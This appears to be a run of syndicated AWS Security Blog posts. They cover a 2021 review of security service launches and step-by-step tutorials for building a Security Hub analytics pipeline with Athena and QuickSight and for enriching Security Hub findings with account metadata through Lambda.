Our customers are increasingly running container workloads in production; helping to raise the security posture of these workloads became an AWS development priority in 2021. GuardDuty for EKS Protection is one recent feature that has resulted from this investment. This new GuardDuty feature monitors Amazon Elastic Kubernetes Service (Amazon EKS) cluster control plane activity by analyzing Kubernetes audit logs. GuardDuty is integrated with Amazon EKS, giving it direct access to the Kubernetes audit logs without requiring you to turn on or store these logs. Once a threat is detected, GuardDuty generates a security finding that includes container details such as pod ID, container image ID, and associated tags. See below for details on how the new Amazon Inspector is also helping to protect containers.

Amazon Inspector

At AWS re:Invent 2021, we launched the new Amazon Inspector, a vulnerability management service that continually scans AWS workloads for software vulnerabilities and unintended network exposure. The original Amazon Inspector was completely re-architected in this release to automate vulnerability management and to deliver near real-time findings to minimize the time needed to discover new vulnerabilities. This new Amazon Inspector has simple one-click enablement and multi-account support using AWS Organizations, similar to our other AWS Security services. This launch also introduces a more accurate vulnerability risk score, called the Inspector score. The Inspector score is a highly contextualized risk score that is generated for each finding by correlating Common Vulnerability and Exposures (CVE) metadata with environmental factors for resources such as network accessibility. This makes it easier for you to identify and prioritize your most critical vulnerabilities for immediate remediation. One of the most important new capabilities is that Amazon Inspector automatically discovers running EC2 instances and container images residing in Amazon Elastic Container Registry (Amazon ECR), at any scale, and immediately starts assessing them for known vulnerabilities. Now you can consolidate your vulnerability management solutions for both Amazon EC2 and Amazon ECR into one fully managed service.

AWS Security Hub

In addition to a significant number of smaller enhancements throughout 2021, in October AWS Security Hub, an AWS cloud security posture management service, addressed a top customer enhancement request by adding support for cross-Region finding aggregation. You can now view all your findings from all accounts and all selected Regions in a single console view, and act on them from an Amazon EventBridge feed in a single account and Region. Looking back at 2021, Security Hub added 72 additional best practice checks, four new AWS service integrations, and 13 new external partner integrations. A few of these integrations are Atlassian Jira Service Management, Forcepoint Cloud Security Gateway (CSG), and Amazon Macie. Security Hub also achieved FedRAMP High authorization to enable security posture management for high-impact workloads.

Amazon Macie

Based on customer feedback, data discovery tool Amazon Macie launched a number of enhancements in 2021. One new feature, which made it easier to manage Amazon Simple Storage Service (Amazon S3) buckets for sensitive data, was criteria-based bucket selection. This Macie feature allows you to define runtime criteria to determine which S3 buckets should be included in a sensitive data-discovery job. When a job runs, Macie identifies the S3 buckets that match your criteria, and automatically adds or removes them from the job’s scope. Before this feature, once a job was configured, it was immutable. Now, for example, you can create a policy where if a bucket becomes public in the future, it’s automatically added to the scan, and similarly, if a bucket is no longer public, it will no longer be included in the daily scan.

Originally Macie included all managed data identifiers available for all scans. However, customers wanted more surgical search criteria. For example, they didn’t want to be informed if there were exposed data types in a particular environment. In September 2021, Macie launched the ability to enable/disable managed data identifiers. This allows you to customize the data types you deem sensitive and would like Macie to alert on, in accordance with your organization’s data governance and privacy needs.

Amazon Detective

Amazon Detective is a service to analyze and visualize security findings and related data to rapidly get to the root cause of potential security issues. In January 2021, Amazon Detective added a convenient, time-saving integration that allows you to start security incident investigation workflows directly from the GuardDuty console. This new hyperlink pivot in the GuardDuty console takes findings directly from the GuardDuty console into the Detective console. Another time-saving capability added was the IP address drill down functionality. This new capability can be useful to security forensic teams performing incident investigations, because it helps quickly determine the communications that took place from an EC2 instance under investigation before, during, and after an event.

In December 2021, Detective added support for AWS Organizations to simplify management for security operations and investigations across all existing and future accounts in an organization. This launch allows new and existing Detective customers to onboard and centrally manage the Detective graph database for up to 1,200 AWS accounts.

AWS Key Management Service

In June 2021, AWS Key Management Service (AWS KMS) introduced multi-Region keys, a capability that lets you replicate keys from one AWS Region into another. With multi-Region keys, you can more easily move encrypted data between Regions without having to decrypt and re-encrypt with different keys for each Region. Multi-Region keys are supported for client-side encryption using direct AWS KMS API calls, or in a simplified manner with the AWS Encryption SDK and Amazon DynamoDB Encryption Client.

AWS Secrets Manager

Last year was a busy year for AWS Secrets Manager, with four feature launches to make it easier to manage secrets at scale, not just for client applications, but also for platforms. In March 2021, Secrets Manager launched multi-Region secrets to automatically replicate secrets for multi-Region workloads. Also in March, Secrets Manager added three new rules to AWS Config, to help administrators verify that secrets in Secrets Manager are configured according to organizational requirements. Then in April 2021, Secrets Manager added a CSI driver plug-in, to make it easy to consume secrets from Amazon EKS by using Kubernetes’s standard Secrets Store interface. In November, Secrets Manager introduced a higher secret limit of 500,000 per account to simplify secrets management for independent software vendors (ISVs) that rely on unique secrets for a large number of end customers. Although launched in January 2022, it’s also worth mentioning Secrets Manager’s release of rotation windows to align automatic rotation of secrets with application maintenance windows.

Amazon CodeGuru and Secrets Manager

In November 2021, AWS announced a new secrets detector feature in Amazon CodeGuru that searches your codebase for hardcoded secrets. Amazon CodeGuru is a developer tool powered by machine learning that provides intelligent recommendations to detect security vulnerabilities, improve code quality, and identify an application’s most expensive lines of code.

This new feature can pinpoint locations in your code with usernames and passwords; database connection strings, tokens, and API keys from AWS; and other service providers. When a secret is found in your code, CodeGuru Reviewer provides an actionable recommendation that links to AWS Secrets Manager, where developers can secure the secret with a point-and-click experience.

Looking ahead for 2022

AWS will continue to deliver experiences in 2022 that meet administrators where they govern, developers where they code, and applications where they run. A lot of customers are moving to container and serverless workloads; you can expect to see more work on this in 2022. You can also expect to see more work around integrations, like CodeGuru Secrets Detector identifying plaintext secrets in code (as noted previously).

To stay up-to-date in the year ahead on the latest product and feature launches and security use cases, be sure to read the Security service launch announcements. Additionally, stay tuned to the AWS Security Blog for Part 2 of this blog series, which will provide an overview of some of the important 2021 launches that security professionals should be aware of across all AWS services.

If you’re looking for more opportunities to learn about AWS security services, check out AWS re:Inforce, the AWS conference focused on cloud security, identity, privacy, and compliance, which will take place June 28-29 in Houston, Texas.

If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, contact AWS Support.

Want more AWS Security news? Follow us on Twitter.

Author

Ryan Holland

Ryan is a Senior Manager with GuardDuty Security Response. His team is responsible for ensuring GuardDuty provides the best security value to customers, including threat intelligence, behavioral analytics, and finding quality.

Author

Marta Taggart

Marta is a Seattle-native and Senior Product Marketing Manager in AWS Security Product Marketing, where she focuses on data protection services. Outside of work you’ll find her trying to convince Jack, her rescue dog, not to chase squirrels and crows (with limited success).

How to build a multi-Region AWS Security Hub analytic pipeline and visualize Security Hub data

Post Syndicated from David Hessler original https://aws.amazon.com/blogs/security/how-to-build-a-multi-region-aws-security-hub-analytic-pipeline/

AWS Security Hub is a service that gives you aggregated visibility into your security and compliance posture across multiple Amazon Web Services (AWS) accounts. By joining Security Hub with Amazon QuickSight—a scalable, serverless, embeddable, machine learning-powered business intelligence (BI) service built for the cloud—your senior leaders and decision-makers can use dashboards to empower data-driven decisions and facilitate a secure configuration of AWS resources

In organizations that operate at cloud scale, being able to summarize and perform trend analysis is key to identifying and remediating problems early, which leads to the overall success of the organization. Additionally, QuickSight dashboards can be embedded in dashboard and reporting platforms that leaders are already familiar with, making the dashboards even more user friendly.

With the solution in this blog post, you can provide leaders with cross-AWS Region views of data to enable decision-makers to assess the health and status of an organizations IT infrastructure at a glance. You also can enrich the dashboard with data sources not available to Security Hub. Finally, this solution allows you the flexibility to have multiple administrator accounts across several AWS organizations and combine them into a single view.

In this blog post, you will learn how to build an analytics pipeline of your Security Hub findings, summarize the data with Amazon Athena, and visualize the data via QuickSight using the following steps:

  • Deploy an AWS Cloud Development Kit (AWS CDK) stack that builds the infrastructure you need to get started.
  • Create an Athena view that summarizes the raw findings.
  • Visualize the summary of findings in QuickSight.
  • Secure QuickSight using best practices.

For a high-level discussion without code examples please see Visualize AWS Security Hub Findings using Analytics and Business Intelligence Tools.

Prerequisites

This blog post assumes that you:

  • Have a basic understanding of how to authenticate and access your AWS account.
  • Are able to run commands via a command line prompt on your local machine.
  • Have a basic understanding of Structured Query Language (SQL).

Solution overview

Figure 1 shows the flow of events and a high-level architecture diagram of the solution.

Figure 1. High level architecture diagram

Figure 1. High level architecture diagram

The steps shown in Figure 1 include:

  • Detect
  • Collect
  • Aggregate
  • Transform
  • Analyze
  • Visualize

Detect

AWS offers a number of tools to help detect security findings continuously. These tools fall into three types:

In this blog, you will use two built-in security standards of Security Hub—CIS AWS Foundations Benchmark controls and AWS Foundational Security Best Practices Standard—and a serverless Prowler scanner that acts as a third-party partner product. In cases where AWS Organizations is used, member accounts send these findings to the member account’s Security Hub

Collect

Within a region, security findings are centralized into a single administrator account using Security Hub.

Aggregate

Using the cross-Region aggregation feature within Security Hub, findings within each administrator account can be aggregated and continuously synchronized across multiple regions.

Ingest

Security Hub not only provides a comprehensive view of security alerts and security posture across your AWS accounts, it also acts as a data sink for your security tools. Any tool that can expose data via AWS Security Finding Format (ASFF) can use the BatchImportFindings API action to push data to Security Hub. For more details, see Using custom product integration to send findings to AWS Security Hub and Available AWS service integrations in the Security Hub User Guide.

Transform

Data coming out of Security Hub is exposed via Amazon EventBridge. Unfortunately, it’s not quite in a form that Athena can consume. EventBridge streams data through Amazon Kinesis Data Firehose directly to Amazon Simple Storage Service (Amazon S3). From Amazon S3, you can create an AWS Lambda function that flattens and fixes some of the column names, such as by removing special characters that Athena cannot recognize. The Lambda function then saves the results back to S3. Finally, an AWS Glue crawler dynamically discovers the schema of the data and creates or updates an Athena table.

Analyze

You will aggregate the raw findings data and create metrics along various grains or pivots by creating a simple yet meaningful Athena view. With Athena, you also can use views to join the data with other data sources, such as your organization’s configuration management database (CMDB) or IT service management (ITSM) system.

Visualize

Using QuickSight, you will register the data sources and build visualizations that can be used to identify areas where security can be improved or reduce risk. This post shares steps detailing how to do this in the Build QuickSight visualizations section below.

Use AWS CDK to deploy the infrastructure

In order to analyze and visualize security related findings, you will need to deploy the infrastructure required to detect, ingest, and transform those findings. You will use an AWS CDK stack to deploy the infrastructure to your account. To begin, review the prerequisites to make sure you have everything you need to deploy the CDK stack. Once the CDK stack is deployed, you can deploy the actual infrastructure. After the infrastructure has been deployed, you will build an Athena view and a QuickSight visualization.

Install the software to deploy the solution

For the solution in this blog post, you must have the following tools installed:

  • The solution in this blog post is written in Python, so you must install Python in addition to CDK. Instructions on how to install Python version 3.X can be found on their downloads page.
  • AWS CDK requires node.js. Directions on how to install node.js can found on the node.js downloads page.
  • This CDK application uses Docker for local bundling. Directions for using Docker can be found at Get Docker.
  • AWS CDK—a software-development framework for defining cloud infrastructure in code and provisioning it through AWS CloudFormation. To install CDK, visit AWS CDK Toolkit page.

To confirm you have the everything you need

  1. Confirm you are running version 1.108.0 or later of CDK.

    $ cdk ‐‐version

  2. Download the code from github by cloning the repository. cd into the clone directory.

    $ git clone [email protected]:aws-samples/aws-security-hub-analytic-pipeline.git

    $ cd aws-security-hub-analytic-pipeline

  3. Manually create a virtualenv.

    $ python3 -m venv .venv

  4. After the initialization process completes and the virtualenv is created, you can use the following step to activate your virtualenv.

    $ source .venv/bin/activate

  5. If you’re using a Windows platform, use the following command to activate virtualenv:

    % .venv/Scripts/activate.bat

  6. Once the virtualenv is activated, you can install the required dependencies.

    $ pip install -r requirements.txt

Use AWS CDK to deploy the infrastructure into your account

The following steps use AWS CDK to deploy the infrastructure. This infrastructure includes the various scanners, Security Hub, EventBridge, and Kinesis Firehose streams. When complete, the raw Security Hub data will already be stored in an S3 bucket.

To deploy the infrastructure using AWS CDK

  1. If you’ve never used AWS CDK in the account you’re using or if you’ve never used CDK in the us-east-1, us-east-2, or us-west-1 Regions, you must bootstrap the regions via the command prompt.

    $ cdk bootstrap

  2. At this point, you can deploy the stack to your default AWS account via the command prompt.

    $ cdk deploy –all

  3. While cdk deploy is running, you will see the output in Figure 2. This is a prompt to ensure you’re aware that you’re making a security-relevant change and creating AWS Identity and Access Management (IAM) roles. Enter y when prompted to continue the deployment process:

    Figure 2. CDK approval prompt to create IAM roles

    Figure 2. CDK approval prompt to create IAM roles

  4. Confirm cdk deploy is finished. When the deployment is finished, you should see three stack ARNs. It will look similar to Figure 3.

    Figure 3. Final output of CDK deploy

    Figure 3. Final output of CDK deploy

As a result of the deployed CDK code, Security Hub and the Prowler scanner will automatically scan your account, process the data, and send it to S3. While it takes less than an hour for some data to be processed and searchable in Athena, we recommend waiting 24 hours before proceeding to the next steps, to ensure enough data is processed to generate useful visualizations. This is because the remaining steps roll-up findings by the hour. Also, it takes several minutes to get initial results from the Security Hub standards and up to an hour to get initial results from Prowler.

Build an Athena view

Now that you’re deployed the infrastructure to detect, ingest, and transform security related findings, it’s time to use an Athena view to accomplish the analyze portion of the solution. The following view aggregates the number of findings for a given day. Athena views can be used to summarize data or enrich it with data from other sources. Use the following steps to build a simple example view. For more information on creating Athena views, see Working with Views.

To build an Athena view

  1. Open the AWS Management Console and ensure that the Region is set to us-east-1 (Northern Virginia).
  2. Navigate to the Athena service. If you’ve never used this service, choose Get Started to navigate to the Query Editor screen. Otherwise, the Query Editor screen is the default view.
  3. If you’re new to Athena, you also need to set up a query result location.
    1. Choose Settings in the top right of the Query Editor screen to open the settings panel.
    2. Choose Select to select a query result location.

      Figure 4. Athena settings

      Figure 4. Athena settings

    3. Locate an S3 bucket in the list that starts with analyticsink-queryresults and choose the right-arrow icon.
    4. Choose Select to select a query results bucket.

      Figure 5. Select S3 location confirmation

      Figure 5. Select S3 location confirmation

  4. Select AwsDataCatalog as the Data source and security_hub_database as the Database. The Query Editor screen should look like Figure 6.

    Figure 6. Empty query editor

    Figure 6. Empty query editor

  5. Copy and paste the following SQL in the query window:

    CREATE OR REPLACE VIEW “security-hub-rolled-up-finding” AS
    SELECT

    “date_format”(“from_iso8601_timestamp”(updatedat), ‘%Y-%m-%d %H:00’) year_month_day
    , region
    , compliance_status
    , workflowstate
    , severity_label
    , COUNT(DISTINCT title) as cnt
    FROM
    security_hub_database.“security-hub-crawled-findings”
    GROUP BY “date_format”(“from_iso8601_timestamp”(updatedat), ‘%Y-%m-%d %H:00’), compliance_status, workflowstate, severity_label, region

  6. Choose the Run query button.

If everything is correct, you should see Query successful in the Results, as shown in Figure 7.

Figure 7. Creating an Athena view

Figure 7. Creating an Athena view

Build QuickSight visualizations

Now that you’ve deployed the infrastructure to detect, ingest, and transform security related findings, and have created an Athena view to analyze those findings, it’s time to use QuickSight to visualize the findings. To use QuickSight, you must first grant QuickSight permissions to access S3 and Athena. Next you create a QuickSight data source. Third, you will create a QuickSight analysis. (Optional) When complete, you can publish the analysis.

You will build a simple visualization that shows counts of findings over time separated by severity, though it’s also possible to use QuickSight to tell rich and compelling visual stories.

In order to use QuickSight, you need to sign up for a QuickSight subscription. Steps to do so can be found in Signing Up for an Amazon QuickSight Subscription.

The first thing you need to do once logged in to QuickSight is create the data source. If this is your first time logging in to the service, you will be greeted with an initial QuickSight page as shown in Figure 8.

Figure 8. Initial QuickSight page

Figure 8. Initial QuickSight page

Grant QuickSight access to S3 and Athena

While creating the Athena data source will enable QuickSight to query data from Athena, you also need to enable QuickSight to read from S3.

To grant QuickSight access to S3 and Athena

  1. Inside QuickSight, select your profile name (upper right). Choose Manage QuickSight, and then choose Security & permissions.
  2. Choose Add or remove.
  3. Ensure the checkbox next to Athena is selected.
  4. Ensure the checkbox next to Amazon S3 is selected.
  5. Choose Details and then choose Select S3 Buckets.
  6. Locate an S3 bucket in the list that starts with analyticsink-bucket and ensure the checkbox is selected.
    Figure 9. Example permissions

    Figure 9. Example permissions

  7. Choose Finish to save changes.

Create a QuickSight dataset

Once you’ve given QuickSight the necessary permissions, you can create a new dataset.

To create a QuickSight dataset

  1. Choose Datasets from the navigation pane at left. Then choose New Dataset.

    Figure 10. Dataset page

    Figure 10. Dataset page

  2. To create a new Athena connection profile, use the following steps:
    1. In the FROM NEW DATA SOURCES section, choose the Athena data source card.
    2. For Data source name, enter a descriptive name. For example: security-hub-rolled-up-finding.
    3. For Athena workgroup choose [ primary ].
    4. Choose Validate connection to test the connection. This also confirms encryption at rest.
    5. Choose Create data source.
  3. On the Choose your table screen, select:
    Catalog: AwsDataCatalog
    Database: security_hub_database
    Table: security-hub-rolled-up-finding
  4. Finally, select the Import to SPICE for quicker analytics option and choose Visualize.

Once you’re finished, the page to create your first analysis will automatically open. Figure 11 shows an example of the page.

Figure 11. Create an analysis page

Figure 11. Create an analysis page

Create a QuickSight analysis

A QuickSight analysis is more than just a visualization—it helps you uncover hidden insights and trends in your data, identify key drivers, and forecast business metrics. You can create rich analytic experiences with QuickSight. For more information, visit Working with Visuals in the QuickSight User Guide.

For simplicity, you’ll build a visualization that summarizes findings categories by severity and aggregated by hour.

To create a QuickSight analysis

  1. Choose Line Chart from the Visual Types.

    Figure 12. Visual types

    Figure 12. Visual types

  2. Select Fields. Figure 13 shows what your field wells should look like at the end of this step.
    1. Locate the year_month_day_hour field in the field list and drag it over to the X axis field well.
    2. Locate the cnt field in the field list and drag it over to the Value field well.
    3. Locate the severity_label field in the field list and drag it over to Color field well.

      Figure 13. Field wells

      Figure 13. Field wells

  3. Add Filters.
    1. Select Filter in the left navigation panel.

      Figure 14. Filters panel

      Figure 14. Filters panel

    2. Choose Create one… and select the compliance_status field.
    3. Expand the filter and clear NOT_AVAILABLE and PASSED (Note: depending on your data, you might not have all of these statuses).
    4. Choose Apply to apply the filter.

      Figure 15. Filtering out findings that are not failing

      Figure 15. Filtering out findings that are not failing

You should now see a visualization that looks like Figure 16, which shows a summary count of events and their severity.

Figure 16. Example visualization (note: this visualization has five days’ worth of data.)

Figure 16. Example visualization (note: this visualization has five days’ worth of data.)

Publish a QuickSight analysis dashboard (optional)

Publishing a dashboard is a great way to share reports with leaders. This two-step process allows you to share visualizations as a dashboard.

To publish a QuickSight analysis

  1. Choose Share on the application bar, then choose Publish dashboard.
  2. Select Publish new dashboard as, and then enter a dashboard name, such as Security Hub Findings by Severity.

You can also embed dashboards into web applications. This requires using the AWS SDK or through the AWS Command Line Interface (AWS CLI). For more information, see Embedding QuickSight Data Dashboards for Everyone.

Encouraged security posture in QuickSight

QuickSight has a number of security features. While the AWS Security section of the QuickSight User Guide goes into detail, here’s a summary of the standards that apply to this specific scenario. For more details see AWS security in Amazon QuickSight within the QuickSight user guide.

Clean up (optional)

When done, you can clean up QuickSight by removing the Athena view and the CDK stack. Follow the detailed steps below to clean up everything.

To clean up QuickSight

  1. Open the console and choose Datasets in the left navigation pane.
  2. Select security-hub-rolled-up-finding then choose Delete dataset.
  3. Confirm dataset deletion by choosing Delete.
  4. Choose Analyses from the left navigation pane.
  5. Choose the menu in the lower right corner of the security-hub-rolled-up-finding card.

    Figure 17. Example analysis card

    Figure 17. Example analysis card

  6. Select Delete and confirm Delete.

To remove the Athena view

  1. Paste the following SQL in the query window:

    DROP VIEW “security-hub-rolled-up-finding”

  2. Choose the Run query button.

To remove the CDK stack

  1. Run the following command in your terminal:

    cdk destroy

    Note: If you experience errors, you might need to reactivate your Python virtual environment by completing steps 3–5 of Use AWS CDK to deploy the infrastructure.

Conclusion

In this blog, you used Security Hub and QuickSight to deploy a scalable analytic pipeline for your security tools. Security Hub allowed you to join and collect security findings from multiple sources. With QuickSight, you summarized data for your senior leaders and decision-makers to give them the right data in real-time.

You ensured that your sensitive data remained protected by explicitly granting QuickSight the ability to read from a specific S3 bucket. By authorizing access only to the data sources needed to visualize your data, you ensure least privilege access. QuickSight supports many other AWS data sources, including Amazon RDS, Amazon Redshift, Lake Formation, and Amazon OpenSearch Service (successor to Amazon Elasticsearch Service). Because the data doesn’t live inside an Amazon Virtual Private Cloud (Amazon VPC), you didn’t need to grant access to any specific VPCs. Limiting access to VPCs is another great way to improve the security of your environment.

 
If you have feedback about this post, submit comments in the Comments section below. If you have questions about this post, start a new thread on the Security Hub forum. To start your 30-day free trial of Security Hub, visit AWS Security Hub.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

David Hessler

David Hessler

David is a senior cloud consultant with AWS Professional Services. He has over a decade of technical experience helping customers tackle their most challenging technical problems and providing tailor-made solutions using AWS services. He is passionate about DevOps, security automation, and how the two work together to allow customers to focus on what matters: their mission.

How to enrich AWS Security Hub findings with account metadata

Post Syndicated from Siva Rajamani original https://aws.amazon.com/blogs/security/how-to-enrich-aws-security-hub-findings-with-account-metadata/

In this blog post, we’ll walk you through how to deploy a solution to enrich AWS Security Hub findings with additional account-related metadata, such as the account name, the Organization Unit (OU) associated with the account, security contact information, and account tags. Account metadata can help you search findings, create insights, and better respond to and remediate findings.

AWS Security Hub ingests findings from multiple AWS services, including Amazon GuardDuty, Amazon Inspector, Amazon Macie, AWS Firewall Manager, AWS Identity and Access Management (IAM) Access Analyzer, and AWS Systems Manager Patch Manager. Findings from each service are normalized into the AWS Security Finding Format (ASFF), so you can review findings in a standardized format and take action quickly. You can use AWS Security Hub to provide a single view of all security-related findings, and to set up alerts, automate remediation, and export specific findings to third‑party incident management systems.

The Security or DevOps teams responsible for investigating, responding to, and remediating Security Hub findings may need additional account metadata beyond the account ID, to determine what to do about the finding or where to route it. For example, determining whether the finding originated from a development or production account can be key to determining the priority of the finding and the type of remediation action needed. Having this metadata information in the finding allows customers to create custom insights in Security Hub to track which OUs or applications (based on account tags) have the most open security issues. This blog post demonstrates a solution to enrich your findings with account metadata to help your Security and DevOps teams better understand and improve their security posture.

Solution Overview

In this solution, you will use a combination of AWS Security Hub, Amazon EventBridge and AWS Lambda to ingest the findings and automatically enrich them with account related metadata by querying AWS Organizations and Account management service APIs. The solution architecture is shown in Figure 1 below:

Figure 1: Solution Architecture and workflow for metadata enrichment

Figure 1: Solution Architecture and workflow for metadata enrichment

The solution workflow includes the following steps:

  1. New findings and updates to existing Security Hub findings from all the member accounts flow into the Security Hub administrator account. Security Hub generates Amazon EventBridge events for the findings.
  2. An EventBridge rule created as part of the solution in the Security Hub administrator account will trigger a Lambda function configured as a target every time an EventBridge notification for a new or updated finding imported into Security Hub matches the EventBridge rule shown below:
    {
      "detail-type": ["Security Hub Findings - Imported"],
      "source": ["aws.securityhub"],
      "detail": {
        "findings": {
          "RecordState": ["ACTIVE"],
          "UserDefinedFields": {
            "findingEnriched": [{
              "exists": false
            }]
          }
        }
      }
    }

  3. The Lambda function uses the account ID from the event payload to retrieve both the account information and the alternate contact information from the AWS Organizations and Account management service API. The following code within the helper.py constructs the account_details object representing the account information to enrich the finding:
    def get_account_details(account_id, role_name):
        account_details ={}
        organizations_client = AwsHelper().get_client('organizations')
        response = organizations_client.describe_account(AccountId=account_id)
        account_details["Name"] = response["Account"]["Name"]
        response = organizations_client.list_parents(ChildId=account_id)
        ou_id = response["Parents"][0]["Id"]
        if ou_id and response["Parents"][0]["Type"] == "ORGANIZATIONAL_UNIT":
            response = organizations_client.describe_organizational_unit(OrganizationalUnitId=ou_id)
            account_details["OUName"] = response["OrganizationalUnit"]["Name"]
        elif ou_id:
            account_details["OUName"] = "ROOT"
        if role_name:
            account_client = AwsHelper().get_session_for_role(role_name).client("account")
        else:
            account_client = AwsHelper().get_client('account')
        try:
            response = account_client.get_alternate_contact(
                AccountId=account_id,
                AlternateContactType='SECURITY'
            )
            if response['AlternateContact']:
                print("contact :{}".format(str(response["AlternateContact"])))
                account_details["AlternateContact"] = response["AlternateContact"]
        except account_client.exceptions.AccessDeniedException as error:
            #Potentially due to calling alternate contact on Org Management account
            print(error.response['Error']['Message'])
        
        response = organizations_client.list_tags_for_resource(ResourceId=account_id)
        results = response["Tags"]
        while "NextToken" in response:
            response = organizations_client.list_tags_for_resource(ResourceId=account_id, NextToken=response["NextToken"])
            results.extend(response["Tags"])
        
        account_details["tags"] = results
        AccountHelper.logger.info("account_details: %s" , str(account_details))
        return account_details

  4. The Lambda function updates the finding using the Security Hub BatchUpdateFindings API to add the account related data into the Note and UserDefinedFields attributes of the SecurityHub finding:
    #lookup and build the finding note and user defined fields  based on account Id
    enrichment_text, tags_dict = enrich_finding(account_id, assume_role_name)
    logger.debug("Text to post: %s" , enrichment_text)
    logger.debug("User defined Fields %s" , json.dumps(tags_dict))
    #add the Note to the finding and add a userDefinedField to use in the event bridge rule and prevent repeat lookups
    response = secHubClient.batch_update_findings(
        FindingIdentifiers=[
            {
                'Id': enrichment_finding_id,
                'ProductArn': enrichment_finding_arn
            }
        ],
        Note={
            'Text': enrichment_text,
            'UpdatedBy': enrichment_author
        },
        UserDefinedFields=tags_dict
    )

    Note: All state change events published by AWS services through Amazon Event Bridge are free of cost. The AWS Lambda free tier includes 1M free requests per month, and 400,000 GB-seconds of compute time per month at the time of publication of this post. If you process 2M requests per month, the estimated cost for this solution would be approximately $7.20 USD per month.

  5. Prerequisites

    1. Your AWS organization must have all features enabled.
    2. This solution requires that you have AWS Security Hub enabled in an AWS multi-account environment which is integrated with AWS Organizations. The AWS Organizations management account must designate a Security Hub administrator account, which can view data from and manage configuration for its member accounts. Follow these steps to designate a Security Hub administrator account for your AWS organization.
    3. All the members accounts are tagged per your organization’s tagging strategy and their security alternate contact is filled. If the tags or alternate contacts are not available, the enrichment will be limited to the Account Name and the Organizational Unit name.
    4. Trusted access must be enabled with AWS Organizations for AWS Account Management service. This will enable the AWS Organizations management account to call the AWS Account Management API operations (such as GetAlternateContact) for other member accounts in the organization. Trusted access can be enabled either by using AWS Management Console or by using AWS CLI and SDKs.

      The following AWS CLI example enables trusted access for AWS Account Management in the calling account’s organization.

      aws organizations enable-aws-service-access --service-principal account.amazonaws.com

    5. An IAM role with a read only access to lookup the GetAlternateContact details must be created in the Organizations management account, with a trust policy that allows the Security Hub administrator account to assume the role.

    Solution Deployment

    This solution consists of two parts:

    1. Create an IAM role in your Organizations management account, giving it necessary permissions as described in the Create the IAM role procedure below.
    2. Deploy the Lambda function and the other associated resources to your Security Hub administrator account

    Create the IAM role

    Using console, AWS CLI or AWS API

    Follow the Creating a role to delegate permissions to an IAM user instructions to create a IAM role using the console, AWS CLI or AWS API in the AWS Organization management account with role name as account-contact-readonly, based on the trust and permission policy template provided below. You will need the account ID of your Security Hub administrator account.

    The IAM trust policy allows the Security Hub administrator account to assume the role in your Organization management account.

    IAM Role trust policy

    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Effect": "Allow",
          "Principal": {
            "AWS": "arn:aws:iam::<SH administrator Account ID>:root"
          },
          "Action": "sts:AssumeRole",
          "Condition": {}
        }
      ]
    }

    Note: Replace the <SH Delegated Account ID> with the account ID of your Security Hub administrator account. Once the solution is deployed, you should update the principal in the trust policy shown above to use the new IAM role created for the solution.

    IAM Permission Policy

    {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Action": [
                    "account:GetAlternateContact"
                ],
                "Resource": "arn:aws:account::<Org. Management Account id>:account/o-*/*"
            }
        ]
    }

    The IAM permission policy allows the Security Hub administrator account to look up the alternate contact information for the member accounts.

    Make a note of the Role ARN for the IAM role similar to this format:

    arn:aws:iam::<Org. Management Account id>:role/account-contact-readonly. 
    			

    You will need this while the deploying the solution in the next procedure.

    Using AWS CloudFormation

    Alternatively, you can use the  provided CloudFormation template to create the role in the management account. The IAM role ARN is available in the Outputs section of the created CloudFormation stack.

    Deploy the Solution to your Security Hub administrator account

    You can deploy the solution using either the AWS Management Console, or from the GitHub repository using the AWS SAM CLI.

    Note: if you have designated an aggregation Region within the Security Hub administrator account, you can deploy this solution only in the aggregation Region, otherwise you need to deploy this solution separately in each Region of the Security Hub administrator account where Security Hub is enabled.

    To deploy the solution using the AWS Management Console

    1. In your Security Hub administrator account, launch the template by choosing the Launch Stack button below, which creates the stack the in us-east-1 Region.

      Note: if your Security Hub aggregation region is different than us-east-1 or want to deploy the solution in a different AWS Region, you can deploy the solution from the GitHub repository described in the next section.

      Select this image to open a link that starts building the CloudFormation stack

    2. On the Quick create stack page, for Stack name, enter a unique stack name for this account; for example, aws-security-hub–findings-enrichment-stack, as shown in Figure 2 below.
      Figure 2: Quick Create CloudFormation stack for the Solution

      Figure 2: Quick Create CloudFormation stack for the Solution

    3. For ManagementAccount, enter the AWS Organizations management account ID.
    4. For OrgManagementAccountContactRole, enter the role ARN of the role you created previously in the Create IAM role procedure.
    5. Choose Create stack.
    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM Role which was created.
    7. Update the principal element of the IAM role trust policy which you previously created in the Organization management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      Figure 3 Update Management Account Role’s Trust

      Figure 3 Update Management Account Role’s Trust

    To deploy the solution from the GitHub Repository and AWS SAM CLI

    1. Install the AWS SAM CLI
    2. Download or clone the github repository using the following commands
      $ git clone https://github.com/aws-samples/aws-security-hub-findings-account-data-enrichment.git
      $ cd aws-security-hub-findings-account-data-enrichment

    3. Update the content of the profile.txt file with the profile name you want to use for the deployment
    4. To create a new bucket for deployment artifacts, run create-bucket.sh by specifying the region as argument as below.
      $ ./create-bucket.sh us-east-1

    5. Deploy the solution to the account by running the deploy.sh script by specifying the region as argument
      $ ./deploy.sh us-east-1

    6. Once the stack is created, go to the Resources tab and take note of the name of the IAM Role which was created.
    7. Update the principal element of the IAM role trust policy which you previously created in the Organization management account in the Create the IAM role procedure above, replacing it with the role name you noted down, as shown below.
      "AWS": "arn:aws:iam::<SH Delegated Account ID>: role/<Role Name>"

    Using the enriched attributes

    To test that the solution is working as expected, you can create a standalone security group with an ingress rule that allows traffic from the internet. This will trigger a finding in Security Hub, which will be populated with the enriched attributes. You can then use these enriched attributes to filter and create custom insights, or take specific response or remediation actions.

    To generate a sample Security Hub finding using AWS CLI

    1. Create a Security Group using following AWS CLI command:
      aws ec2 create-security-group --group-name TestSecHubEnrichmentSG--description "Test Security Hub enrichment function"

    2. Make a note of the security group ID from the output, and use it in Step 3 below.
    3. Add an ingress rule to the security group which allows unrestricted traffic on port 100:
      aws ec2 authorize-security-group-ingress --group-id <Replace Security group ID> --protocol tcp --port 100 --cidr 0.0.0.0/0

